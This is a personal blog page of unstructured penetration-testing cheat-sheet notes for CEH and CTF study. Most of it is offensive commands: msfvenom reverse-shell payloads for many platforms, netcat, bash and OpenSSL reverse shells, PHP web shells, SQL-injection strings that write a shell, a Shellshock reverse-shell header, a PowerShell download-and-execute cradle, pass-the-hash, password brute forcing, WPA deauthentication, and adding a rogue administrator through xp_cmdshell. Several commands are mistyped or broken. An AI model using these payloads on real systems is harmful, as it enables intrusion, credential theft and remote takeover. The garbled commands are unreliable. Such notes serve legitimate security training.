CEH Practical – LPT (Master) – CTF
Notes
I have gather these notes from internet and cources that I have attended .
Special thanks to:
JENS GILGES
https://www.linkedin.com/in/jens-gilges-1aa719151/
I used this site as notepad to remember things, not to get you an answer. So if you don’t like it, don’t read it.
It has no structre and no index, just my notes from videos, other sites and manuals.
And I dont go thru spelling checks before post.
Thanks for the knowledge:
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Recon/Information Gathering
Passive
Social Media, Company Website, Public Availble Resources, Jobs Openning. Netcraft, Archive.org, Shodan, Metagofile, Maltego,recon-ng, Pipls, Thearchive.org,sub3listr
Active
Interactive with the victim. Become a facebook friend for example
Goggle Search
site:”invid.se” filetype:pdf
intitle:”VNC viewer for Java”
intitle:”VNC viewer for Java”
inurl:”/control/userimage.html”
inurl:.php? intext:CHARACTER_SETS,COLLATIONS intitle:phpmyadmin
Extract ip from host command
host http://www.cisco.com | grep “has address” |cut -d” ” -f4
Extract domain from index.html
wget invid.se
cat index.html | grep “href” | cut -d”/” -f3 | grep “site\.se” | cut -d'”‘ -f1 | sort -u > site.txt
www data extractor
Windows
Web Data Extractor
Linux
httrack (linux)
Enumeration / Scanning
Banner grabbing
whatweb host.se
Netdiscover
Passive Mode
netdiscover -i eth0 -p
Active Mode
netdiscover -ai eth0 -r 192.168.8.0/24 -f
Nmap explain closed,filtered
An application is actively accepting TCP connections, UDP datagrams or SCTP associations on this port. Finding these is often the primary goal of port scanning. Security-minded people know that each open port is an avenue for attack. Attackers and pen-testers want to exploit the open ports, while administrators try to close or protect them with firewalls without thwarting legitimate users. Open ports are also interesting for non-security scans because they show services available for use on the network.
closed
A closed port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it. They can be helpful in showing that a host is up on an IP address (host discovery, or ping scanning), and as part of OS detection. Because closed ports are reachable, it may be worth scanning later in case some open up. Administrators may want to consider blocking such ports with a firewall. Then they would appear in the filtered state, discussed next.
filtered
Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. The filtering could be from a dedicated firewall device, router rules, or host-based firewall software. These ports frustrate attackers because they provide so little information. Sometimes they respond with ICMP error messages such as type 3 code 13 (destination unreachable: communication administratively prohibited), but filters that simply drop probes without responding are far more common. This forces Nmap to retry several times just in case the probe was dropped due to network congestion rather than filtering. This slows down the scan dramatically.
unfiltered
The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN scan, may help resolve whether the port is open.
open|filtered
Nmap places ports in this state when it is unable to determine whether a port is open or filtered. This occurs for scan types in which open ports give no response. The lack of response could also mean that a packet filter dropped the probe or any response it elicited. So Nmap does not know for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way.
closed|filtered
This state is used when Nmap is unable to determine whether a port is closed or filtered. It is only used for the IP ID idle scan.
Nmap examples
nmap -p 80 –script=http-enum http://www.certifiedhacker.com
nmap -p- -Pn -sS -sV -A 10.10.10.1
nmap -p- -Pn -sU -sS -sV -A 10.10.10.1
nmap -sC -sV -oA nmap/initial 10.10.10.1
nmap -p 445 –script safe -Pn -n 10.10.10.1
nmap -p 445 –script “vuln and safe” -Pn -n 10.10.10.1
Nmap Scripts
–script=vuln All default vulnerability scrips
–script=http-enum HTTP enum Banner Grab and so on
–script=http-shellshock Shellchock detect
–script=smb-brute SMB Brute Force
Search for scripts
grep -r categories /usr/share/nmap/scripts/*.nse
grep -r categories /usr/share/nmap/scripts/*.nse | grep safe
grep -r categories /usr/share/nmap/scripts/*.nse | grep -oP ‘”.*?”‘| sort -u
grep -r categories /usr/share/nmap/scripts/*.nse | grep default | awk -F: ‘{print $1}’
Default scripts and smb:
locate -r ‘\.nse$’ | xargs grep categories | grep ‘default\|version’ | grep smb
Nmap – Options
-n disable dns
-sC standard scipt
-sn ping sweep
-sT Connect Scan 3 way handshake
-sS Stealth halv open scan syn ->syn ack -> reset
-sX Xmas scan (Fin/Urg/push) no repsonse port open (LINUX machines)
-sN Nullscan TCP packet with no data. no repsonse port open (LINUX machines)
-sV Version
-sU UDP scan
-p- -A all ports and Agressive
-sU -p 162 snmp agent
Nmap – Combos
-sS -sV Stealt and Version
-sI Idle scan, zombie node (good for ids)
-sS -O Operating System
-sn -f Ping sweep fragmentation
-p 80 -A -T3 Port 80 Agressive on port 80 and tray harder with T3 (T0 -T5) T0 slow T5 fast
-sS -D:RND:10 Decoy
Portscaning with Netcat
TCP scan
nc -nvv -w 1 -z 10.0.2.15 1-10000
UDP scan
udp can have false positive if the host dont respond on icmp
nc -unvv -w 1 -z 10.0.2.15 160-165
Hping3
Half-Open SYN scan
XMAS Tree Scan
hping3 -F -P -U
Null Scan
hping3
Fin Scan
hping3 -F
Ack Scan
hping3 -A
Udp scan
hping3 -2
Ping and portscan from shell
ping from shell to get online hosts
for ip in $(seq 1 254); do ping -c 1 172.20.40.$ip > /dev/null && echo “Online: 172.20.40.$ip”; done
Portscan from shell without nmap or you can download static nmap from github
for port in 22 25 80 443 445 8080 8443; do (echo Anything > /dev/tcp/172.20.40.201/$port && echo “open – $port”) 2> /dev/null; done
Look for ports that is open or close with bash
bash -c ‘echo 1> /dev/tcp/172.20.20.188/1900 && echo open || echo false’
Gobuster
./gobuster -fw -k -u https://10.10.10.1 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Dirb
dirb http://10.10.10.1 /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Curl
curl –url “imap://mail.example.com/” –user “bobby:tables”
Upload
curl –upload-file file.txt -v –url <url> -0 –http1.0
Cewl
Find words on webpages that can be used for password crack.
cewl http://www.site.se -m 6 -w /cewl.txt
Can then be passed to John The Ripper
Directory or Path Traversal
192.168.1.1/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd
Null Byte
?page=../../../../../etc/passwd%00
Wpscan
wpscan –u http://10.1.1.1/ –enumerate t –enumerate t –enumerate u
wpscan -u http://10.1.1.1 -e –log tenten_wpscan.txt
wpscan –url <url> Scan cms
wpscan –url <url> –enumerate vp (Scan plugins)
wpscan –url <url> –enumerate ut (scan Themes)
wpscan –url <url> –enumerate u (Enumerate Users)
wpscan –url <url> –wordlist pass.txt threats 50 (BruteForse)
Metagoofil
metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html
Nikto
nıkto -h 10.1.1.1
Drupe scan
./droopescan scan drupal -u http://192.168.2.152
Dns
nslookup
server 10.10.10.100
host -t ns domain.se
host -t mx domain.se
host http://www.domain.se
Zonetransfer
host -t axfr domain.se ns1.domain.se
host -l domain.se 10.1.1.1
zone transfers
host -l server.se ns3.server.se.
Reverse DNS
theharvester -n -d host.se -b all
Dnsenum
dnsenum domain.se
Dnsrecon
dnsrecon -d 10.10.10.100 -r 10.0.0.0/8
Smtp
vrfy
for user in $(cat users.txt); do echo VRFY $user |nc -nv -w 192.168.1.1 25 2>/dev/null | grep ^”250″;done
Python script to vrfy
python
#!/usr/bin/python
import socket
import sys
if len(sys.argv) !=2:
print “Usage: vrfy.py <username>”
sys.exit(0)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((‘127.0.0.1’,25))
print banner
s.send(‘VRFY ‘ + sys.argv[1] + ‘r\n\’
result=s.recv(1024)
print result
s.close()
Smb
Rpcclient
Old
rpcclient -U roger 192.168.1.1
srvinfo
enumdomusers
enumalsgroups domain
lookupnames administrators
querydominfo
enumdomusers
queryuser roger
Nbtscan
nbtscan -f target
nbtscan -v verbose
Smb enumeration
Enum4linux -a 192.168.1.1
Smb nmap
nmap –script=vuln 192.1681.1 -p445
Smbclient
Look for shares
smbclient -L //10.10.10.100 -U name
smbclient \\\\192.168.1.1\\Share -W DOMAIN -U roger
Smbmap
Locate Shares:
smbmap -H 10.10.10.100
List Files on Share
smbmap -R Replication -H 10.10.10.100
List Files
smbmap -R Replication -H 10.10.10.100 -A Groups.xml -q
smbmap -u username -p ‘HASH:HASH’ -H 192.168.1.1 -R –download path/pathtofile.xt
–download Download file with smbmap
Smbclient
smbclient //10.10.10.100/Replication
recurse ON
prompt OFF
mget *
Smb impacket
/usr/share/doc/python-impacket/examples/GetADUsers.py -all domain.dc/svc_user -dc-ip 10.10.10.1
/usr/share/doc/python-impacket/examples/psexec.py domain.dc/svc_tgs@10.10.10.1
smbmap -d domain.dc -u svc_user -p password -H 10.10.10.1
/usr/share/doc/python-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.1 domain.dc/svc_user
/usr/share/doc/python-impacket/examples/psexec.py domain.dc/Administrator@10.10.1.1
-R ‘List file
Password from GPO Policy
less /usr/share/smbmap/10.1.1.1/Replication_domain.dc_Policies_\{31B2F340-016D-11D2-945F-00C0aFB984F9\}_MACHINE_Preferences_Groups_Groups.xml
edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJa3mjWA98ga9guKOhaOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
PASSWORDWITH_gpp-decrypt
Windows Tips
Run as command
runas /netonly /user:domain.dc\svc_user cmd
Windows Credentials Editor (WCE)
wce64.exe -w
Sharphound
SharpHound.exe -c all -d domain.dc –domaincontroller 10.10.1.1
Find files Windows
where /R C:\ bash.exe
Getting Access and Maintaining Acccess
Searchsploit
Mirror down
searchsplit -m exploits/php/webapps/18650.py
searchsploit -x exploits/php/webapps/18650.py
searchsploit -p exploits/php/webapps/18650.py
Metasploit
Start databas
service postgresql start
Start Metasploit
msfconsole -q
exit backround session ctrl z or type background
exploit -j
sessions -i
sessions l
setg = global value ex. setg RHOST 192.168.1.1
Metaexploit Steps
mfsconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST ip
SET LPORT port
exploit -j
Access the exploit
shell.aspx
shell
systeminfo
search suggest exploits
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
use exploit/windows/local/ms10_015_kitrap0d
set lhost ip
set lport port
Create Payloads
Msfvenom
Linux
msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.1 LPORT=4444 SHELL=/bin/bash -a cmd –platform Unix -e generic/none
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f elf > shell.elf
Windows
msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.1 lport=8888 –f exe > /root/Desktop/1.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f macho > shell.macho
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
msfvenom -p php/meterpreter_reverse_tcp lhost=10.10.14.10 LPORT=4444 > r2.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.1 LPORT=444 -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.1 LPORT=444 -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.1 LPORT=444 -f raw > shell.pl
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Unicorn
Create Payload
python unicorn.py windows/meterpreter/reverse_http 10.1.1.1 8001
Use exploit and create payload
Exploit:
chmod 755 cve-2017-8759_toolkit.py
Create Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=6996 -f exe > /tmp/gotcha.exe
Create rtf file from exploit
python cve-2017-8759_toolkit.py -M gen -w Gotcha.rtf -u http://192.168.1.101/gotcha.txt
Host The Payload on our server
python cve-2017-8759_toolkit.py -M exp -e http://192.168.1.101/gotcha.exe -l /tmp/gotcha.exe
Mini webserver with python
python -m SimpleHTTPServer 80
Filedownload
PowerShell
powershell IEX(new-object net.webclient).downloadstring(‘http://10.1.1.10/empire.ps1‘)”
Linux
wget 192.168.1.1:80/attack.txt
curl 192.168.1.1:80/attack.txt > file.txt
fetch http:// 192.168.1.1:80/attack.txt
Victim > Attacker
nc -lvp 4444 > file.txt
nc 192.168.1.1 4444 < file.txt
Attacker > Victim
Target
nc -nvlp 81 > file.txt
Attacker
nc 192.268.1.1. 82 < file.txt
Netcat
Victim:
nc -lvnp 4444 > incomming.exe
Source:
nc -nv 10.0.2.15 4444 </usr/share/windows-binaries/wget.exe
Windows
Tftp
Server
atftpd -v –port 69 –bind-address 10.10.10.2 –daemon /srv/tftp/
Client
tftp -i 192.168.1.1 GET nc.exe
Ftp
On Windows you can script this with a text file
ftp -s ftp.txt
Ftp 192.168.1.1.1
ls
get nc.exe
put nc.exe
set binary
Reverse Shell
Netcat
Ncat to get support for ssl and rules
nc -lvnp 4444
Connector
nc -nv 192.168.1.1 25
Netcat Command execution
Victim
nc -lvnp 4444 -e /bin/bash
Source
nc -nv 10.0.2.15 4444
Netcat Windows to get PowerShell shell
nc64.exe 10.1.1.1 9001 -e powershell
Shell from dash or bad shell
Attacker:
nc -nlvp 9001
Victim
bash -c ’bach -i >& /dev/tcp/192.168.1.1/9001 0>&1’
You get shell on Attacker then
python -c ‘import pty; pty.spawn(“/bin/bash”)’
After that
script -q /dev/null
Then backround
ctrl z
Then type
stty raw -echo
Then hit fg for foreground
OpenSSH
openssl req -x509 -newkey
rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Start the Listener on Attacker
openssl s_server -quiet
-key key.pem -cert cert.pem -port 4444
Start reverse shell on victim with openssl
mkfifo /tmp/s; /bin/sh -i <
/tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.1. >
/tmp/s; rm /tmp/s
ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f aspx -o shell.aspx
PHP
Create s.php
/*s.php*/
<?php echo shell_exec($_GET[‘cmd’]);?>
Copy nc.exe and s.php to web folder
http://10.10.10.1/s.php?cmd=nc 10.10.14.10 4444 -e cmd
wget 10.1.1.1:80/php-reverse-shell.txt -P /var/www/admin/
mv /var/www/admin/php-reverse-shell.txt /var/www/admin/php-reverse-shell.php
Nice remote shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’
set TERM=linux
No real bash
ctrl z
background
stty raw -echo
fg
Password
Responder
Set up responder to listen to clients and capture hashes
responder
Capture LTM hashes from sql injection
Start smb server On Attacker
impacket-smbserver share $(pwd)
Use this on the webpage:
; use master; exec xp_dirtree ‘\\10.1.1.1\share’;–
Unshadow
sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > ~/passwords.txt
HASHCAT
hashcat -h | grep -i ntlm
hashcat -m 3100 haches.txt /opt/share/wordlist/rocky.txt
to launch a combination attack against MD5 password hashes
hashcat -m 0 -a 1 /root/hashes/hashes.txt /root/rockyou.txt
a straight through attack is super fast on simple passwords
hashcat -m 0 -a 0 /root/hashes/hashes.txt /root/rockyou.txt
John The Ripper
john hashes.txt -format=nt -show (CrackNTLM)
use the cewel.txt in john the ripper to
john –wordlist=cvewl.txt –rules –stdout > pass.txt
john –wordlist:/usr/share/wordlists/rockyou.txt
RSA
Now we need to convert the rsa key to john format and save it in a file:
#root@kali: ssh2john rsakey > rsa2johnfile
Now crack the passphrase using any wordlist:
#root@kali: john –wordlist=/usr/share/wordlists/rockyou.txt –format=SSH rsa2johnfile
When it’s done, you can show the password if it has been cracked by issuing the following command:
#root@kali: john –show rsa2johnfile
Passwords dumps Windows
Pwdump and FGdump
crunch Create Passwordlists
crunch 6 6 01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ
Passing The Hash
Passing the hash
pth-*
export SMBHASH=1231234124124124124:1243124124124124124124124
pth-winexe -U administrator% //192.168.1.1 cmd
Medusa
medua -h 192.168.1.1. -u admin -P password.txt -M http -m DIR:/admin -T 20
Ncrack
use for rdp brute force
ncrack -v -f –user administrator -P password.txt rdp//192.168.1.1,CL1
Hydra
hydra -l root -P /usr/share/wordlists/rockyou.txt -u -s 22 10.1.1.1 ssh
hydra 10.1.1.1 -V -l user -P /usr/share/wordlists/rockyou.txt http-get-form “/login.php:username=^USER^&password=^PASS^&Login=Login:F=The password you entered was not valid.:H=Cookie: PHPSESSID=2tr9o96unnmlrgfom8hbaqhp7l; security=low”
hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form “/:password=^PASS^:Invalid password!” -s 54415 -I
MySQL
Connect to local database
mysql -u zabbix -D zabbixdb -p
Sqlmap
Use burpsuite to capture login request
Save login request to login.req
sqlmap r login.req –level 5
Search for databases
sqlmap –u http://192.168.1.1/index.php?par= –dbs
Checking privileges of the users in database
sqlmap –u 192.168.1.124/sqli/Less-1/?id=1 –privileges
Reading a file from the web server
sqlmap -u 192.168.1.124/sqli/Less-1/?id=1 –file-read=/xampp/htdocs/index.php –batch
Dump Username and Password
sqlmap -u http//192.168.1.1/comment.php?id123 –dbms=mysql –dump -threads=5
Dump tables
sqlmap –u http://192.168.1.1/index.php?par= –dbs –D dbname –tables –-dump
sqlmap –u http://192.168.1.1/index.php?par= –dbs –D dbname –T tablename –-dump
Automated Shell
sqlmap -u http//192.168.1.1/comment.php?id123 –dbms=mysql –os-shell
sqlmap -u http://10.1.1.1/login.php –forms –level 5 –risk 3 –string “The password you entered was not valid.” –dbs –batch
sqlmap -l trace.txt –dbs (RDBMS Enum)
sqlmap -l trace.txt -D <db> –tables (Dump tables)
sqlmap -l trace.txt -D <db> -T <table> –dump (Dump table content)
Crawl links
sqlmap -u http://192.168.1.1 –crawl=1
sqlmap -u http:// 192.168.1.1 –forms –batch –crawl=5 –cookie=jsessionid=1234 –level=5 –risk=3
Manual sql injection commands
Check for sqli vulnerability
?id=1′
Find the number of columns
?id=1 order by 9 — –
Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8,9 — –
Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8,9 — –
Get version
?id=1 union select 1,2,3,4,version(),6,7,8,9 — –
Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables — –
Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = ‘users’ — –
Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users
Read file
?id=1 union select 1,2,3,4, load_file(‘/etc/passwd’) ,6,7,8,9 — –
?id=1 union select 1,2,3,4, load_file(‘/var/www/login.php’) ,6,7,8,9 — –
Create a file and call it to check if really created
?id=1 union select 1,2,3,4,’this is a test message’ ,6,7,8,9 into outfile ‘/var/www/test’ — –
?id=1 union select 1,2,3,4, load_file(‘/var/www/test’) ,6,7,8,9 — –
Create a file to get a shell
?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>’ ,6,7,8,9 into outfile ‘/var/www/shell.php’ — –
?id=1 union select null,null,null,null, load_file(‘/var/www/shell.php’) ,6,7,8,9 — –
Then go to browser and see if you can execute commands
http://<targetip>/shell.php?cmd=id
Sql injections
|
User name |
Password |
SQL Query |
|
tom |
tom |
SELECT * FROM users |
|
tom |
‘ or ‘1’=’1 |
SELECT * FROM users |
|
tom |
‘ or 1=’1 |
SELECT * FROM users |
|
tom |
1′ or 1=1 — – |
SELECT * FROM users |
|
‘ or ‘1’=’1 |
‘ or ‘1’=’1 |
SELECT * FROM users |
|
‘ or ‘ 1=1 |
‘ or ‘ 1=1 |
SELECT * FROM users |
|
1′ or 1=1 — – |
blah |
SELECT * FROM users |
‘or 1=1#
‘ or ‘1’=’1
Command injections
;ls
sqsh – Interactive database shell for Sybase
Login
sqsh -S 127.0.0.1:123 -U sa -P secretpassword
exec xp_cmdshell ‘whoami’
go
exec xp_cmdshell ‘net user roger pass /add’
go
exec xp_cmdshell ‘net localgroup Administrators roger /add’
go
exec xp_cmdshell ‘net localgroup “Remote Desktop Users” roger /add’
go
Shellshock with Burpsuite
User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.1/8081 0>&1
Snmp
snmpwalk 10.1.1.1 -c public -v 2c
onesixtyone
HEX to TXT and Back
xxd -ps fil.txt > fil.txt.hex
vi fil.txt.hex
xxd -r -ps fil.txt.hex > fil.txt
Stego and Strings
steghide –extract -sf ./Granted.jpg
binwalk -e
java -jar Stegsolve.jar
strings ./HackerAccessGranted.jpg
Stego Links
https://www.dcode.fr/caesar-cipher
https://www.splitbrain.org/_static/ook/
https://incoherency.co.uk/image-steganography/#unhide
Magic Numbers
hex to bin
xxd -r hashdump.txt hex.bz2
Links
https://en.wikipedia.org/wiki/List_of_file_signatures
Base64 encode decode
base64 filename.exe > file.txt
base64 -d file.txt > filename.exe
Base64 command and execute
echo ls /home | base64
bHMgL2hvbWUK
echo bHMgL2hvbWUK | base64 -d | bash
ProxyChains
Comming
Chisel
TCP tunnel over HTTP
https://github.com/jpillora/chisel.git
Attacker
chisel server -p 8000 -reverse -v
Client (Victim)
chisell client 172.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
Windows Privilage Escalation
systeminfo
hostname
echo %username%
net users
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule all
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:”KB..” /C:”KB..”
Sysinternals
accesschk.exe
net start
net stop
Registry Checks for Passwords
reg query HKLM /f password /t REG_SZ /s >pass.txt
reg query HKCU /f password /t REG_SZ /s >pass.txt
C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini
Find writable files
dir /a-r-d /s /b
Empire Setup
git clone https://github.com/EmpireProject/Empire.git -b dev
cd Empire
cd setup
setup.sh
PowerShell
Invoke-AllChecks
Linux Privilege Escalation
The things that I have used from this page is:
# Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -1000 -type d 2>/dev/null
# SGID (chmod 2000) – run as the group, not the user who started it.
find / -perm -g=s -type f 2>/dev/null
# SUID (chmod 4000) – run as the owner, not the user who started it.
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r “bin$”`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in ‘common’ places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
LinEnum
./LinEnum.sh -t > kali.txt
Commands
cat /etc/issue
cat /etc/lsb-release
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ps aux | grep root
crontab -l
Port forward
ssh -L 8080:127.0.0.1:80 root@192.168.1.1
ssh -R 8080:127.0.0.1:80 root@192.168.1.1
Binary Exploitation
Tools
OllyDebuger
Immunity Debugger
gdb
Binary Ninja
Stacks
Buffers
Fuzzing
Registers
EAX
ECX
EDX
EBX
ESP
EBP
ESI
EDI
EIP Control the path of Code execution
Debug Applications
r2
aaa (Analyse all)
afl (List funtions)
pdf @ main
pdc @main as c code
ldd list libarary to an application
ldd /usr/
Ruby pattern create tool
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
Ruby mach was was found in the EIP
/usr/share/metaspoit-framwork/tools/pattern_offset.rb
Ruby find jmp esp
/usr/share/metaspoit-framwork/tools/nasm_shell.rb
JMP ESP
Shrink Go Binaries
Shrink go binaries
go build -ldfkags=”-s -w”
and
upx brute chisel
Tcp dump icmp packets
tcpdump -i eth0 icmp -n
Covering Tracks
Metasploit
Linux tips and tricks
Updatedb
Update database for mlocate
updatedb
Count characters
echo -n asjdflkjalskdjflkjasdfljldkf | wc -c
md5sum
echo -n ’ asjdflkjalskdjflkjasdfljldkf’ | md5sum
Run a command immune to hangups
nohup
Wireless
### Check Config
iwconfig
### Enable Monitoring
airmon-ng start
iwconfig
### Looking for AP
airodump-ng wlan0mon
### Looking for Clients
airodump-ng –bssid <ap> –channel <ap channel> wlan0mon
### Start Recording
airodump-ng –bssid <ap> –channel <ap channel> –showack -w wpa_log wlan0mon
### Deauth
airplay-ng -0 20 -a <ap> -c <client> wlan0mon
## Crack
aicrack-ng wpa_log.cpa -w usr/share/wordlist/rockyou.txt
Links
Exploits
https://www.exploit-db.com/google-hacking-database
John The Ripper
https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c
Linux Priv Escalation
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Magic Numbers
https://en.wikipedia.org/wiki/List_of_file_signatures
Stego Links
https://www.dcode.fr/caesar-cipher
https://www.splitbrain.org/_static/ook/
https://incoherency.co.uk/image-steganography/#unhide
Github tools
0d1n
Door404
Hacking-Tools-Repository
massExpConsole
routersploit
Sublist3r
airgeddon
DorkMe
hashcat-legacy
metagoofil
scavenger
takeover
aron
droopescan
hashstack-server-plugin-jtr
nemesis
SecLists
TheFatRat
AutoSploit
EagleEye
InSpy
osint-scraper
seeker
Trity
badKarma
Eternalblue-Doublepulsar-Metasploit
Leaked
osrframework
SharpHound
wordlist
Bashark
exploitpack-master
linpostexp
Photon
SiteBroker
wpscan
BloodHound
firesheep
Log-killer
PowerSploit
SocialBox
xerxes
Cl0neMast3r
fuxploider
lscript
pywerview
SocialFish
Cortex-Analyzers
Gopherus
machine_learning_security
ReconDog
sshng2john
DarkSpiritz
hackbox
mail-security-tester
RED_HAWK
stash.sqlite
Tips and Tricks 
OMG insane
LikeLike
Wow, this is great resource. Could you flick me a email, would like to chat more about the certs.
LikeLike
Done!
LikeLike